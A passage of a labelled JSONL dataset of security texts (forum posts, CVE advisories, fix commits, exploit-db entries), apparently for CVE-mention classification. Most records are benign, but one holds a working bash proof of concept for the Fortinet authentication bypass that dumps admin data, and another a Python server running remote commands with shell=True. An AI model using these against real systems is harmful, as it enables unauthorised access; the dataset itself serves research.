becoming an expert in Python? I'm looking for courses that cover advanced Python topics and best practices, and that offer hands-on projects and assignments to reinforce my learning. Hoping for some suggestions on this. Thanks", "source": "go4expert", "timestamp": "2023-03-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "adabd61a4672d6cf7e6b", "text": "MoinMoin Improper Access Control vulnerability\n\n[Severity: HIGH]\n\nMoinMoin 1.7.x before 1.7.3 and 1.8.x before 1.8.3 checks parent ACLs in certain inappropriate circumstances during processing of hierarchical ACLs, which allows remote attackers to bypass intended access restrictions by requesting an item, a different vulnerability than CVE-2008-6603.", "source": "github_advisory", "timestamp": "2022-05-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "72d891a8d139d5e54146", "text": "TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE)\n\n# Exploit Title: TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE)\n\n# Date: 02.14.2023\n# Exploit Author: Andreas Finstad\n# Vendor Homepage: https://titanftp.com/\n\n# Version: < 2.0.1.2102\n\n# Tested on: Windows 2022 Server\n# CVE : CVE-2023-22629\n\n\nExploit and description here:\nhttps://f20.be/blog/titanftp\n\nKind regards\nAndreas Finstad", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ae7f62ada474adeb74c5", "text": "CVE: CVE-2022-23623\n\n[{'lang': 'en', 'value': 'Frourio is a full stack framework, for TypeScript. Frourio users who uses frourio version prior to v0.26.0 and integration with class-validator through `validators/` folder are subject to a input validation vulnerability. Validators do not work properly for request bodies and queries in specific situations and some input is not validated at all. Users are advised to update frourio to v0.26.0 or later and to install `class-transformer` and `reflect-metadata`.'}]\n\nFix commit: feat(validation): use class-transformer to support validation of nested objects", "source": "cvefixes", "timestamp": "2022-02-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "46ca263c0babaa5e7a14", "text": "CVE: CVE-2021-3839\n\n[{'lang': 'en', 'value': 'A flaw was found in the vhost library in DPDK. Function vhost_user_set_inflight_fd() does not validate `msg->payload.inflight.num_queues`, possibly causing out-of-bounds memory read/write. Any software using DPDK vhost library may crash as a result of this vulnerability.'}]\n\nFix commit: vhost: fix queue number check when setting inflight FD\n\nIn function vhost_user_set_inflight_fd, queue number in inflight\nmessage is used to access virtqueue. However, queue number could\nbe larger than VHOST_MAX_VRING and cause write OOB as this number\nwill be used to write inflight info in virtqueue structure. This\npatch checks the queue number to avoid the issue and also make\nsure virtqueues are allocated before setting inflight information.\n\nFixes: ad0a4ae491fe (\"vhost: checkout resubmit inflight information\")\nCc: stable@dpdk.org\n\nReported-by: Wenxiang Qian \nSigned-off-by: Chenbo Xia \nReviewed-by: Maxime Coquelin ", "source": "cvefixes", "timestamp": "2022-08-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6a373aa40cfe98f89075", "text": "Uncaught Exception in fastify-multipart\n\n[Severity: HIGH]\n\n### Impact\n\nThis is a bypass of CVE-2020-8136 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8136).\nBy providing a `name=constructor` property it is still possible to crash the application.\nThe original fix only checks for the key `__proto__` (https://github.com/fastify/fastify-multipart/pull/116).\n\nAll users are recommended to upgrade\n\n### Patches\n\nv5.3.1 includes a patch\n \n### Workarounds\n\nNo workarounds are possible.\n\n### References\n\nRead up https://www.fastify.io/docs/latest/Guides/Prototype-Poisoning/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [https://github.com/fastify/fastify-multipart](https://github.com/fastify/fastify-multipart)\n* Email us at [hello@matteocollina.com](mailto:hello@matteocollina.com)\n", "source": "github_advisory", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dc75dd49cb9e55957e46", "text": "I figured out what we were doing wrong today. You may have received a message asking you to confirm whether you want to proceed to establish ssh connection with the host because the host is “unrecognized”. You would have had to make one of three options looking something like this “Yes/no/fingerprint”. If you saw this message, then the mistake you are making is, you are using the wrong user identity. In my case it was “htb_student” instead of “htb-student”. The underscore used in place of the hyphen was the major cause. Essentially what it might mean is that you connected to a different host who’s password is not “HTB_ @cademy_stdnt !”", "source": "hackthebox", "timestamp": "2022-09-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f053e41150d0d5855f1c", "text": "[Uncontrolled Resource Consumption] [CVE-2022-44572] Possible Denial of Service Vulnerability in Rack’s RFC2183 boundary parsing\n\nI reported at https://hackerone.com/reports/1639882\n\nhttps://discuss.rubyonrails.org/t/cve-2022-44572-possible-denial-of-service-vulnerability-in-racks-rfc2183-boundary-parsing/82124\n> There is a denial of service vulnerability in the multipart parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44572.\n> Carefully crafted input can cause RFC2183 multipart boundary parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\n\n## Impact\n\nAny applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\nThis regular expression does not have the effect of ReDoS countermeasures using memoization in Ruby 3.2.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bcc0443c9c311629aa62", "text": "Change in port should be considered a change in origin\n\n[Severity: HIGH]\n\n### Impact\n\n`Authorization` and `Cookie` headers on requests are sensitive information. On making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request, before containing. Previously, we would only consider a change in host or scheme downgrade. Now, we consider any change in host, port or scheme to be a change in origin.\n\n### Patches\n\nAffected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5.\n\n### Workarounds\n\nAn alternative approach would be to use your own redirect middleware, rather than ours, if you are unable to upgrade. If you do not require or expect redirects to be followed, one should simply disable redirects all together.\n\n### References\n\n* [RFC9110 Section 15.4](https://www.rfc-editor.org/rfc/rfc9110.html#name-redirection-3xx)\n* [CVE-2022-27776](https://curl.se/docs/CVE-2022-27776.html)\n\n### For more information\n\nIf you have any questions or comments about this advisory, please get in touch with us in `#guzzle` on the [PHP HTTP Slack](https://php-http.slack.com/). Do not report additional security advisories in that public channel, however please follow our [vulnerability reporting process](https://github.com/guzzle/guzzle/security/policy).\n", "source": "github_advisory", "timestamp": "2022-06-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2ab56a70ddfd15e1d178", "text": "CVE: CVE-2021-3995\n\n[{'lang': 'en', 'value': 'A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.'}]\n\nFix commit: libmount: fix UID check for FUSE umount [CVE-2021-3995]\n\nImproper UID check allows an unprivileged user to unmount FUSE\nfilesystems of users with similar UID.\n\nSigned-off-by: Karel Zak ", "source": "cvefixes", "timestamp": "2022-08-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a356ba87a4e6ce98bc24", "text": "Seriously it is 2022. Just do some basic google search and youtube search and there will be thousand free contents. Spoiler alert: crash courses from Google are awesome!", "source": "parrotsec", "timestamp": "2022-01-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "db44aec7671b05d4945f", "text": "About Activ Directory Mitre Attact TTPs?\n\nHi. I’m learning AD testing. Does anybody have Mitre Attack TTP codes for all Activ Directory testing methods? Thanks.", "source": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9949d3af940bda6f8f08", "text": "use the command tasklist as indicated in the question. you got the rest right (almost)", "source": "hackthebox", "timestamp": "2022-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "947a04daba3862bd5ddf", "text": "If there is still an opening, I’d like a chance to join. I have been doing most of this stuff solo, would love to get more involved. DM me if this is still available.", "source": "hackthebox", "timestamp": "2022-07-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2eb2ad6a3b7e34f7a8da", "text": "Parsing a / from a file name\n\nI have a shell script that I run on Mac computers. It searches for certain characters and replaces them with a - The only character that does not work is the / Using this for One Drive Sync issues as it does not allow the / in the file name and will not sync. I have tried using / and // in the code, but nothing is working correctly. Any ideas? Code: type or pastebadchars='|?*,#;:&@+<>%$~{}\\/' find . -name \"*[$badchars]*\" | while read -r file\ndo target_name=$(echo \"$file\" | tr \"$badchars\" - )\necho \"Target Name\" $target_name if [ \"$file\" != \"$target_name\" ]; then if [ -e $target_name ]; then echo \"WARNING: $target_name already exists, file not renamed\" else echo \"Move $file to $target_name\" mv \"$file\" \"$target_name\" fi fi\ndone", "source": "go4expert", "timestamp": "2022-10-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c81dcc241b42013db52c", "text": "CVE: CVE-2022-25358\n\n[{'lang': 'en', 'value': 'A ..%2F path traversal vulnerability exists in the path handler of awful-salmonella-tar before 0.0.4. Attackers can only list directories (not read files). This occurs because the safe-path? Scheme predicate is not used for directories.'}]\n\nFix commit: Fix path traversal vulnerability\n\nThis change fixes a path traversal vulnerability that would allow\nattackers to navigate through the filesystem of the server (provided\nexecute access to directories for the user running the web server).\nAttackers could only list the contents of directories -- not download\nfiles.\n\nThe vulnerability was caused by the lack of a check for the validity\nrequested paths when handling directories, notably when `..%2F' (`../`\nURL-encoded) was present in requested paths.\n\nBackground:\n\nawful-samonella-tar is implemented using awful [0]. Awful is\nimplemented on top of spiffy [1], and overrides the\n`(handle-not-found)` parameter to map URL paths to procedures. Spiffy\ntakes some precautions regarding dealing with malicious paths when it\nhandles static files. Code that uses spiffy to implement generation\nof dynamic content (like awful does), must take their own precautions.\n\nawful-salmonella-tar uses a procedure (`safe-path?') with a relatively\nstrict policy to allow access to files, but it was not being used to\nvalidate access to directories, and that was causing the\nvulnerability.\n\nThis change applies `safe-path?` to all requested paths.\n\nThanks to Chris Brannon for responsibly reporting this issue.\n\n[0] https://wiki.call-cc.org/eggref/5/awful\n[1] https://wiki.call-cc.org/eggref/5/spiffy", "source": "cvefixes", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "63015a75bb81cf3f4a7d", "text": "Thank you very much! It took a day to figure out your hint but I finally got it. Much appreciated. Looking back now, I can’t believe I struggled so much on this one.", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "22ce98095159626e8950", "text": "CVE: CVE-2022-31173\n\n[{'lang': 'en', 'value': 'Juniper is a GraphQL server library for Rust. Affected versions of Juniper are vulnerable to uncontrolled recursion resulting in a program crash. This issue has been addressed in version 0.15.10. Users are advised to upgrade. Users unable to upgrade should limit the recursion depth manually.'}]\n\nFix commit: Backport CVE-2022-31173 fix from GHSA-4rx6-g5vg-5f3j\n\nCo-authored-by: ilslv ", "source": "cvefixes", "timestamp": "2022-08-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "50acec0bea2c0e002133", "text": "With credentials and login admin page, u can deploy reverse shell via upload file and trigger it. You can got flag 4 and flag 5 is not hard. GTFOBins help you escape privilege", "source": "hackthebox", "timestamp": "2023-10-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "744ce3ec4f386cb35ff7", "text": "After prompted PayloadBunny, it became clear that it was not necessary to use the script and brute force, and I stupidly found the answer through google, but it was no longer bruteforce, but OSINT)) But the fact that the question itself was confusing me is 100%)", "source": "hackthebox", "timestamp": "2022-07-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e7396ebeeeba5568d803", "text": "There are some shell upgrades to get a usable bash shell, have a look at different methods…", "source": "hackthebox", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cd4277d6f47b87ee5e6f", "text": "FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass\n\n# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)\n# Date: 13/10/2022\n# Exploit Author: Felipe Alcantara (Filiplain)\n# Vendor Homepage: https://www.fortinet.com/\n# Version:\n#FortiOS from 7.2.0 to 7.2.1\n#FortiOS from 7.0.0 to 7.0.6\n#FortiProxy 7.2.0\n#FortiProxy from 7.0.0 to 7.0.6\n#FortiSwitchManager 7.2.0\n#FortiSwitchManager 7.0.0\n# Tested on: Kali Linux\n# CVE : CVE-2022-40684\n\n# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass\n\n# Usage: ./poc.sh \n# Example: ./poc.sh 10.10.10.120 8443\n\n#!/bin/bash\n\nred=\"\\e[0;31m\\033[1m\"\nblue=\"\\e[0;34m\\033[1m\"\nyellow=\"\\e[0;33m\\033[1m\"\nend=\"\\033[0m\\e[0m\"\n\ntarget=$1\nport=$2\n\nvuln () {\n\necho -e \"${yellow}[+] Dumping System Information: ${end}\"\n\ntimeout 10 curl -s -k -X $'GET' \\\n -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\\\": gzip, deflate' -H $'Forwarded: by=\\\"[127.0.0.1]:80\\\";for=\\\"[127.0.0.1]:49490\\\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \"https://$target:$port/api/v2/cmdb/system/admin\" > $target.out\nif [ \"$?\" == \"0\" ];then\n grep \"results\" ./$target.out >/dev/null\n if [ \"$?\" == \"0\" ];then\n echo -e \"${blue}Vulnerable: Saved to file $PWD/$target.out ${end}\"\n else\n rm -f ./$target.out\n echo -e \"${red}Not Vulnerable ${end}\"\n fi\n\nelse\n\n echo -e \"${red}Not Vulnerable ${end}\"\n rm -f ./$target.out\n\nfi\n\n\n}\n\nvuln", "source": "exploitdb", "timestamp": "2023-03-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b82caef5bfd853cb1399", "text": "Pentesting Pre-engagement phase\n\nHello hackersploit community, I have a nooby question, I plan to start providing pentesting services to some clients, I’m following the NIST SP 800-115 but does not go much in depth with the pre-engagement part, like ROE meetings, kick off meeting, scoping, legal considerations etc… what has been your experience with these topics with your clients and how do you usually approach it, do you guys have a checklist?", "source": "hackersploit", "timestamp": "2023-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e395f7169b136ca5d6f7", "text": "CVE: CVE-2022-0588\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in Packagist librenms/librenms prior to 22.2.0.'}]\n\nFix commit: Moved some pages to be within admin route (#13782)\n\n* Moved plugin admin pages to be within admin route\r\n* Wrap html transports page in admin check\r\n* Moved Port group controller to be admin protected\r\n* fixed tests", "source": "cvefixes", "timestamp": "2022-02-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8478d43159ddcecb41c6", "text": "I need help to pass the last achievement, I find the other user, and I follow the hint that said use the password list inside the folder, but nothing. Can you give me any clue?", "source": "hackthebox", "timestamp": "2022-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "13482a48f97562c4283c", "text": "RubyGems Regular Expression Denial of Service\n\n[Severity: MEDIUM]\n\nAlgorithmic complexity vulnerability in `Gem::Version::ANCHORED_VERSION_PATTERN` in `lib/rubygems/version.rb` in RubyGems before 1.8.23.2, 1.8.24 through 1.8.26, 2.0.x before 2.0.10, and 2.1.x before 2.1.5, as used in Ruby 1.9.0 through 2.0.0p247, allows remote attackers to cause a denial of service (CPU consumption) via a crafted gem version that triggers a large amount of backtracking in a regular expression. NOTE: this issue is due to an incomplete fix for CVE-2013-4287.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5507b77e07175eb9fd4a", "text": "Stop asking how to hack. Start understanding the \"hack\"\n\nHacking is not about compromising a target Hacking is all about how much you understand the target. The more you understand, the more you know how to find the weakness and exploit the logic. For example: The code didn’t validate the input? You can inject malicious stuff. But what if the input is validated? Can you find the weakness in the logic and exploit it? It’s a logic game The tools help you understand the target The tools help you gather information about the target: running services, applications. Tools help you seeing what’s going on and you can start making the plan to find the weakness. Counter point : This helps me / him / her exploit thousands of servers. Yes, it helps. But how about a totally new target? How about finding new vulnerability? Tools might help you on that. But there are things tools can’t do. So start making questions like “what is it”, “how does it work”, “is there any weakness” and “what can I gain from this” Stop asking “learn skills”. It’s all about combining your skills. Let me take an example (source: United States Navy SEAL selection and training - Wikipedia ) image 1013×309 62.1 KB Normal army units learn CQB (close-quarter combat) too Recon units learn land navigation skills too (and airborne) Combat medics learn medical skills too => SEAL units must be mastering all of them (and more) to be elite units. The skills are required for specific missions. Cybersecurity is similar. You must know developing, system, networking, … image 650×434 45.8 KB Counterpoint: I already knew this and that. So what? If you know something deep enough, for example: coding. Start thinking about the logic, finding the weakness and dangerous things can happen. Then start asking questions like: is there any vulnerable logic? Is there anything to exploit it? What’s the impact? How to fix this problem. That’s all. Cybersecurity is not a thing to learn. It’s the combination of mixed knowledge. If you REALLY want to learn cybersecurity, start learning basic knowledge, and start questioning everything.", "source": "parrotsec", "timestamp": "2023-09-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f90bea2446146ea820a4", "text": "Awesome challenge so far, I have to agree with others that the biggest hustle was finding where to inject command. There is no need to base64 encode anything if you don’t want. Feel free to PM me if you are stuck.", "source": "hackthebox", "timestamp": "2023-10-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "953a075891d17ca8f6af", "text": "CVE: CVE-2021-36625\n\n[{'lang': 'en', 'value': 'An SQL Injection vulnerability exists in Dolibarr ERP/CRM 13.0.2 (fixed version is 14.0.0) via a POST request to the country_id parameter in an UPDATE statement.'}]\n\nFix commit: Fix sql injection", "source": "cvefixes", "timestamp": "2022-03-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4d62b33b994ae2d05a32", "text": "* find / -name .bak 2>/dev/null will return all files with .bak extension and using |wc - l will give a count of them.", "source": "hackthebox", "timestamp": "2022-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7c7450a89f45266b8ee3", "text": "Python Server/Client Sockets help\n\nI am trying to learn server/client sockets in python. I can establish the server and client and make the connection. I would like the server to ask the client to input a command. I would like the command to be TIME and I would like the response to display the current time. How do I do that? Here is my server code: Code: #shell_server.py for python3\nimport socket\nimport subprocess s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind((\"0.0.0.0\",444))\ns.listen(1) while True: connexion, client_address = s.accept() print (\"connexion from :\" +str(client_address)) while True: connexion.send(bytes(\"Entrer cmd : \", \"utf-8\")) cmd = connexion.recv(1024).decode() # p = subprocess.Popen(cmd.split(\" \"),shell=True p = subprocess.Popen(cmd,shell=True ,stdout=subprocess.PIPE,stderr = subprocess.PIPE) out , err = p.communicate() connexion.send(out) And here is my client code: Code: #shell_client.py for python3\nimport socket s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"127.0.0.1\",444)) while True: data = s.recv(4096) print(data.decode()) cmd = input() s.send(cmd.encode('utf-8')) So how do I input TIME and receive the current time?", "source": "go4expert", "timestamp": "2022-12-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7544d04f58766cb0fa70", "text": "Updated Nmap Cheat Sheet for 2023!\n\nAnd the updated Nmap Cheat Sheet for 2023! Nmap Cheat Sheet 2023: All the Commands, Flags & Switches StationX – 13 Dec 22 Nmap Cheat Sheet 2023: All the Commands, Flags & Switches Discover the most useful nmap scanning, enumeration, and evasion commands with our comprehensive Nmap cheat sheet and take your hacking to the next level. Have fun!", "source": "hackersploit", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2e2d97c3ff9aecf2904f", "text": "Advanced Host Monitor v12.56 - Unquoted Service Path\n\n# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path\n# Date: 2023-04-23\n# CVE: CVE-2023-2417\n# Exploit Author: MrEmpy\n# Vendor Homepage: https://www.ks-soft.net\n# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm\n# Version: > 12.56\n# Tested on: Windows 10 21H2\n\n\nTitle:\n================\nAdvanced Host Monitor > 12.56 - Unquoted Service Path\n\n\nSummary:\n================\nAn unquoted service path vulnerability has been discovered in Advanced Host\nMonitor version > 12.56 affecting the executable \"C:\\Program Files\n(x86)\\HostMonitor\\RMA-Win\\rma_active.exe\" . This vulnerability occurs when\nthe service's path is misconfigured, allowing an attacker to run a\nmalicious file instead of the legitimate executable associated with the\nservice.\n\nAn attacker with local user privileges could exploit this vulnerability to\nreplace the legitimate RMA-Win\\rma_active.exe service executable with a\nmalicious file of the same name and located in a directory that has a\nhigher priority than the legitimate directory. That way, when the service\nstarts, it will run the malicious file instead of the legitimate\nexecutable, allowing the attacker to execute arbitrary code, gain\nunauthorized access to the compromised system, or stop the service from\nfunctioning.\n\nTo exploit this vulnerability, an attacker would need local access to the\nsystem and the ability to write and replace files on the system. The\nvulnerability can be mitigated by correcting the service path to correctly\nquote the full path of the executable, including quotation marks.\nFurthermore, it is recommended that users keep software updated with the\nlatest security updates and limit physical and network access to their\nsystems to prevent malicious attacks.\n\n\nProof of Concept:\n================\n\nC:\\>sc qc ActiveRMAService\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: ActiveRMAService\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\n(x86)\\HostMonitor\\RMA-Win\\rma_active.exe /service\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : KS Active Remote Monitoring Agent\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem", "source": "exploitdb", "timestamp": "2023-05-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "abf3ec305251c95b9a5d", "text": "Famous_Hacker: if u have to make a first step where would u start from? Much of the other advice is for you to jump onto hacking scenario sites that walk you somewhat quickly hands-on through using various tools to hack and what to hack, which is great. Do that. My additional advice is to learn each tool to understand and master how it works and what it is capable of in order to be a proficient hacker. You will eventually have to learn the tools more in depth and be able to apply them efficiently case-by-case in real life. You can do that later or a little while you are going through any hacking scenario. Good luck and have fun!", "source": "parrotsec", "timestamp": "2022-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "229e24404f71808d55fe", "text": "Only a few seconds after spawned the target,I can’t connect to the target. I scan the given port and it shows that the port is closed.I have tried pwnbox, but still meet the same problem. Anyone could help?Thx image 823×294 39 KB", "source": "hackthebox", "timestamp": "2022-10-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bb6b9a2cda0350b7c5de", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-11-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2a9b3389f1af44050419", "text": "even the VPN sometimes is not safe i heard some VPN servers discloses the ip of there clients to the agencies", "source": "hackersploit", "timestamp": "2022-05-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dbb8f3dbf536facbb2e0", "text": "Hi, I resumed the last section “Skills Assessment - Service Login” after a while but unfortunately I didn’t write down the usernames obtained in the previous sections, is H**** P***** ? If not, could someone send them to me in DM? So I can try to do the last exercise without repeating the previous ones. EDIT ok i get it! A suggestion: follow the hint to start trying only with name and surname", "source": "hackthebox", "timestamp": "2022-04-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ddce8a31990f20b2fca3", "text": "Sounds like it will work! The only thing I can think of is things that use your GFX-card for processingpower and that a smaller specced laptop may struggle with those parts. However, it should work to crack hashes etc also but just not as fast as something with a OMGROFLCOPTER Nvidia card", "source": "hackersploit", "timestamp": "2022-09-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "10de651a190fe50c1a3d", "text": "Data Science Course Suggestion\n\nHello, Anyone who's pursuing Data Science course help me with this? I've checked lot of posts and websites. Not really sure if those curriculum can be trusted and picked up. Let me know. Can I easily grab a job after this?", "source": "go4expert", "timestamp": "2022-03-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e6978f200908099cd9c0", "text": "CVE: CVE-2022-1284\n\n[{'lang': 'en', 'value': 'heap-use-after-free in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of inducing denial of service.'}]\n\nFix commit: Fix UAF in `aaef` ##crash\n\n* Reported by @hdthky\n* Reproducer: uaf-aef\n* BountyID: e98ad92c-3a64-48fb-84d4-d13afdbcbdd7", "source": "cvefixes", "timestamp": "2022-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3f9c5ba9e930f173dbbe", "text": "Sequelize - Default support for “raw attributes” when using parentheses\n\n[Severity: CRITICAL]\n\n### Impact\n\nSequelize 6.28.2 and prior has a dangerous feature where using parentheses in the attribute option would make Sequelize use the string as-is in the SQL\n\n```ts\nUser.findAll({\n attributes: [\n ['count(id)', 'count']\n ]\n});\n```\n\nProduced\n\n```sql\nSELECT count(id) AS \"count\" FROM \"users\"\n```\n\n### Patches\n\nThis feature was deprecated in Sequelize 5, and using it prints a deprecation warning.\n\nThis issue has been patched in [`@sequelize/core@7.0.0.alpha-20`](https://github.com/sequelize/sequelize/pull/15374) and [`sequelize@6.29.0`](https://github.com/sequelize/sequelize/pull/15710). \n\nIn Sequelize 7, it now produces the following:\n\n```sql\nSELECT \"count(id)\" AS \"count\" FROM \"users\"\n```\n\nIn Sequelize 6, it throws an error explaining that we had to introduce a breaking change, and requires the user to explicitly opt-in to either the Sequelize 7 behavior (always escape) or the Sequelize 5 behavior (inline attributes that include `()` without escaping). See https://github.com/sequelize/sequelize/pull/15710 for more information.\n\n### Mitigations\n\nDo not use user-provided content to build your list or attributes. If you do, make sure that attribute in question actually exists on your model by checking that it exists in the `rawAttributes` property of your model first.\n\n---\n\nA discussion thread about this issue is open at https://github.com/sequelize/sequelize/discussions/15694\nCVE: CVE-2023-22578", "source": "github_advisory", "timestamp": "2023-02-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3d3d0ec0ba06c80e877b", "text": "CVE: CVE-2021-23484\n\n[{'lang': 'en', 'value': 'The package zip-local before 0.3.5 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) which can lead to an extraction of a crafted file outside the intended extraction directory.'}]\n\nFix commit: add test for sync unzipping a zip-slip attack file", "source": "cvefixes", "timestamp": "2022-01-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e2397f8b82b2696d1960", "text": "[Improper Authorization] CVE-2023-47037: Airflow Broken Access Control Vulnerability\n\nHi IBB,\nApache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. \n\n\nHere is the conversation between the security team of airflow.\n\n█████\n\nMore Details:\nhttps://lists.apache.org/thread/04y4vrw1t2xl030gswtctc4nt1w90cb0\n\n## Impact\n\nBroken Access Control Vulnerability.", "source": "hackerone", "timestamp": "2023-11-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "89542221dc1762565167", "text": "A job in web development calls for a lot of creativity as well as in-depth expertise in computer science, software engineering, and programming. HTML, CSS, JavaScript, and other front-end web technologies are what give websites their distinctive looks and functionalities, thus web developers need to be well-versed in them. In order to understand what clients want from their website and how to best accomplish it, web developers must be able to communicate with them. Although it is a very technical subject, web development is also quite rewarding because it offers endless opportunities to those who work in it. Web developers not only have a variety of specialties, but also possess a broad range of skills and competencies.", "source": "go4expert", "timestamp": "2023-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "04eeedf5c004bfba3704", "text": "xmldom allows multiple root nodes in a DOM\n\n[Severity: CRITICAL]\n\n### Impact\nxmldom parses XML that is not well-formed because it contains multiple top level elements, and adds all root nodes to the `childNodes` collection of the `Document`, without reporting any error or throwing.\nThis breaks the assumption that there is only a single root node in the tree, which led to https://nvd.nist.gov/vuln/detail/CVE-2022-39299 and is a potential issue for dependents.\n\n### Patches\nUpdate to `@xmldom/xmldom@~0.7.7`, `@xmldom/xmldom@~0.8.4` (dist-tag `latest`) or `@xmldom/xmldom@>=0.9.0-beta.4` (dist-tag `next`).\n\n### Workarounds\nOne of the following approaches might help, depending on your use case:\n- Instead of searching for elements in the whole DOM, only search in the `documentElement`.\n- Reject a document with a document that has more then 1 `childNode`.\n\n### References\n- https://nvd.nist.gov/vuln/detail/CVE-2022-39299\n- https://github.com/jindw/xmldom/issues/150\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at security@xmldom.org\n", "source": "github_advisory", "timestamp": "2022-11-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ab0e89e8f75e32a566dc", "text": "CVE: CVE-2022-23589\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, Grappler component of TensorFlow can trigger a null pointer dereference. There are 2 places where this can occur, for the same malicious alteration of a `SavedModel` file (fixing the first one would trigger the same dereference in the 